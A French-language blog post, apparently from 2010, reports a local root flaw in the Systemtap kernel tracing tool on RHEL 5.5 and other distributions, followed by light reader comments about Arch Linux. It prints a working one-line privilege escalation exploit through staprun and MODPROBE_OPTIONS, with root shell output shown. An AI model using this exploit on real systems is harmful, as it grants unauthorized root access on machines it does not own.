Local Root Exploit in systemtap


Exploit
Une nouvelle faille de sécurité vient d'être découverte sous Linux et plus particulièrement dans le logiciel Systemtap, un outil d'administration permettant de suivre l'activité du noyau. L'exploit permet ainsi à un simple utilisateur de passer root sur une machine. Systemtap n'est en revanche installé par défaut que sur un nombre très limité de distributions, comme le Red Hat Entreprise Linux 5.5.

Le seul moyen de contrer cette attaque est de mettre à jour son système. Voici un exemple d'utilisation sur une RHEL 5.5 :

$ cat /etc/redhat-release
Red Hat Enterprise Linux Server release 5.5 (Tikanga)
$ rpm -qa | grep systemtap
systemtap-runtime-1.1-3.el5_5.2
systemtap-1.1-3.el5_5.2

On lance ensuite l'exploit comme ceci :

$ printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever

sh-3.2# id
uid=0(root) gid=0(root)

L'exploit fonctionne aussi sous Fedora, Ubuntu et d'autres distributions, à condition d'installer systemtap au préalable. Comme il faut un compte root pour faire cela, l'exploitation de la faille reste très limitée.

Pour installer cet outil sur une distribution à base de Debian, ouvrez un terminal et lancez la commande suivante :

sudo apt-get install systemtap-runtime

Ou celle-ci pour une distribution à base de RPM :

su -c 'yum install systemtap'


6 Commentaires pour "Local Root Exploit in systemtap"

Flux des commentaires de cet article Ajouter un commentaire
  •  

    Ce paquet n'existe pas sous archlinux, sauf dans l'AUR (dépôt des utilisateurs), c'est une bonne nouvelle dans le fond ;)

    RépondreRépondre
    wido , le 29 novembre 2010 à 15:15
  •  

    Il y a visiblement pas beaucoup de distributions qui le propose par défaut.

    RépondreRépondre
    pti-seb , le 29 novembre 2010 à 19:42
  •  

    @WIdo: Normal, Archlinux est LA meilleure distro.

    RépondreRépondre
    Ypnose , le 30 novembre 2010 à 02:06
  •  

    @Ypnose :
    -POOOOIIIIINNNNN- Ypnose, vous avez une amende d'un crédit pour atteinte au code de moralité du troll.

    RépondreRépondre
    Kegeruneku , le 30 novembre 2010 à 23:02
  •  

    @Kegeruneku : Hahahaha Bien joué!

    RépondreRépondre
    Ypnose , le 30 novembre 2010 à 23:20
  •  

    @Ypnose: Tout est une question de réflexes, v'voyez ? :)

    RépondreRépondre
    Kegeruneku , le 1 décembre 2010 à 01:40
 

Ajouter un commentaire

actualité android apache apple astuce astuces bash bilboblog blog boot chrome clavier commande commandes conky date debian Desktop développement elementary exploit faille fedora firefox flash gimp gnome google graphique Graphisme hack hacking Hardware humour intel internet iphone jailbreak Jeux Kde kernel libre Linux log logiciels Logiciels Libres lucid lynx maemo mail maquette metasploit microsoft mobile mockup monitoring mozilla multi-touch musique mysql n900 nautilus nokia noyau openoffice open source password photos php Planet publicité red hat redhat rpm réseau screenshot script serveur serveurs shell sql ssh statistiques sysadmin system Sécurité thème tux-planet tv twitter ubuntu unity vidéo vidéos vlc voyage wallpaper windows wordpress yum